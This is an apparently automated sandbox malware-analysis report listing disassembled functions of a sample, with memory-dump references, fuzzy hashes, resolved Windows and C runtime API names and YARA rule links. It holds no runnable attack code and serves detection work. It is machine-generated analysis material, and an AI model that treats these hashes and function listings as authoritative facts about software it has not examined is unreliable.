                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                      • Instruction ID: fe9fe97029fae64295ddaaef3cb21eac4938b986b6450b136dcae405b6290f11
                                                                      • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                      • Instruction Fuzzy Hash: 38516C719112088BEB24CF69D98979EBBF4FB08318F24806BD459E7360D774A940CF94
                                                                      Function 02D3F067 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                      • Instruction ID: 09bb4dad679b956c5703ed3d384991ad8b1c9777e8de9de31714e22f09e4fbd0
                                                                      • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                      • Instruction Fuzzy Hash: E241D4759187459FD340CF29C58061AFBE1FBD8318F649A1EF889A3350D776E982CA82
                                                                      Function 02D5A8E5 Relevance: 1.3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                      • Instruction ID: d4be69216c38012e5358e8a6e7a505755607a7ebc13387c3a3c333f765071f4c
                                                                      • Opcode Fuzzy Hash: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                      • Instruction Fuzzy Hash: B0E01231400228FBCF11AB14D908A593B6AEF44242F414864F809AA262CB75EE42CE90
                                                                      Function 02D64FD9 Relevance: .6, Instructions: 637COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                                      • Instruction ID: 6c276b4edc6d9b94fcfd9389c74bf9a2e7449d079a46ec72207a1b348c4cb265
                                                                      • Opcode Fuzzy Hash: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                                      • Instruction Fuzzy Hash: D6324831D29F414ED7239A34D826335A248AFB72C9F55D737E81AB5EA6FB29C4C38101
                                                                      Function 02D3671B Relevance: .6, Instructions: 598COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                                      • Instruction ID: 8ce3b1b7e76373cecae9566aeeffda26e4761cfba2aeba004fb12fc872e7da61
                                                                      • Opcode Fuzzy Hash: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                                      • Instruction Fuzzy Hash: 8432BF71608745ABC72ACF28C48076AB7E9BF84318F044A2DF8958B381DB75DD45CBDA
                                                                      Function 02D2B595 Relevance: .4, Instructions: 382COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                                      • Instruction ID: 99a60b9800eac54f3d9c0a40350d22a88e7386614455f77d260c71d1aaa6fc5c
                                                                      • Opcode Fuzzy Hash: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                                      • Instruction Fuzzy Hash: 57B1B462A0435076CA04B774EC75AFE37AADFA1708F40091EE446677D5EE649E08CAB3
                                                                      Function 02D6A93B Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                      • Instruction ID: df69b70191aa56f9aed6aa4cc1e6cdd2ddcd83003e539b97ef6732a7f24ebd87
                                                                      • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                      • Instruction Fuzzy Hash: A8B138312106099FD715CF28C48AB657BA1FF45369F298659E8DADF3A1C336ED81CB40
                                                                      Function 02D55B38 Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                      • Instruction ID: 884d056e8f4504be64bf128eafcf52a4f08c172ed66588792479ff0212af9379
                                                                      • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                      • Instruction Fuzzy Hash: 906169B1600B3456DF3A4A28F8987BE63A9EF42708FC4091ADC82DB380D7D1DD41CB55
                                                                      Function 02D558DB Relevance: .2, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                      • Instruction ID: 1ad7ddbedc6bb3afbb8721eba5433941621ab3356179789b46ca6b4e0f52ccdd
                                                                      • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                      • Instruction Fuzzy Hash: B261577120473596DE368928B8D47BE6395DF41268FC00419EC87DB380DBD9ED46CB66
                                                                      Function 02D3F1D0 Relevance: .2, Instructions: 187COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                                      • Instruction ID: 46b82e3cfd26d857b8ae685646a3ff524336c6c56b1cef7771bc6567c78c2c07
                                                                      • Opcode Fuzzy Hash: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                                      • Instruction Fuzzy Hash: E1614B32A083459FC305DB24D881A5BB7E5EFD8714F450A2DF49996650EB31EE088A92
                                                                      Function 02C920C4 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                      • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                      • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                      • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                      Function 02D4FD80 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction ID: 158fc0bed478757dc426cc3e986e746d663d3c9b4cbdffebad349dbe767dddef
                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction Fuzzy Hash: BE115B772001C28FD6148B6ED8B46B6E796EFC522972D437AD0424BF79DF22D941D900
                                                                      Function 02C9D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C9D29D
                                                                        • Part of subcall function 02C9D268: GetProcAddress.KERNEL32(00000000), ref: 02C9D281
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                      • API String ID: 1646373207-1918263038
                                                                      • Opcode ID: d66333bbfe9721035f6c1e2468a8a8b9bfeab26bf19c038265c3b3fdbf10d57a
                                                                      • Instruction ID: fdd8de92cae8658a9598b244eb4f2f0a84a6398a162ca8079aa0f2d245d74a9a
                                                                      • Opcode Fuzzy Hash: d66333bbfe9721035f6c1e2468a8a8b9bfeab26bf19c038265c3b3fdbf10d57a
                                                                      • Instruction Fuzzy Hash: 2D4121F1A883486B6E087B6D7508427F7DED348B143E0851BF407ABB91DA30FC539A29
                                                                      Function 02CA6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02CA6EDE
                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02CA6EEF
                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02CA6EFF
                                                                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02CA6F0F
                                                                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02CA6F1F
                                                                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02CA6F2F
                                                                      • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02CA6F3F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                      • API String ID: 667068680-2233174745
                                                                      • Opcode ID: 07fd71996d840803233d4578bdba2360a0298101801c5317ef3b5c2563c153c3
                                                                      • Instruction ID: 889fa93e0ebd72a4bdced7dfa748cd15bca2d801482f4e0755fa09c7cf66c46f
                                                                      • Opcode Fuzzy Hash: 07fd71996d840803233d4578bdba2360a0298101801c5317ef3b5c2563c153c3
                                                                      • Instruction Fuzzy Hash: 50F0C0F2AC83827DBF01BBB05CD9B662F5DA721B0C7782D35B80355582E77694109F10
                                                                      Function 02D66A3D Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$___from_strstr_to_strchr_wcschr
                                                                      • String ID:
                                                                      • API String ID: 1963305004-0
                                                                      • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                      • Instruction ID: 0744667f265a300589cbae3d049b259cef1a165b17007bccecfacb49b54f6d64
                                                                      • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                      • Instruction Fuzzy Hash: BED1D571904714ABDF25AF789D48B7A7BAEEF01314F04816AE94597380E77ADD40CBE0
                                                                      Function 02D5D367 Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                      • Instruction ID: 0d0261e3b39cf80e5eb2297b9034f34085733d648ab883d24416061c3364001b
                                                                      • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                      • Instruction Fuzzy Hash: E9B16B71900359ABDF21DF68C880BAEBBF6EF09304F54406AE899A7351D7B59C45CB70
                                                                      Function 02D688D6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 02D6890F
                                                                      • ___free_lconv_mon.LIBCMT ref: 02D6891A
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B2F
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B41
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B53
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B65
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B77
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B89
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B9B
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BAD
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BBF
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BD1
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BE3
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BF5
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67C07
                                                                      • _free.LIBCMT ref: 02D68931
                                                                      • _free.LIBCMT ref: 02D68946
                                                                      • _free.LIBCMT ref: 02D68951
                                                                      • _free.LIBCMT ref: 02D68973
                                                                      • _free.LIBCMT ref: 02D68986
                                                                      • _free.LIBCMT ref: 02D68994
                                                                      • _free.LIBCMT ref: 02D6899F
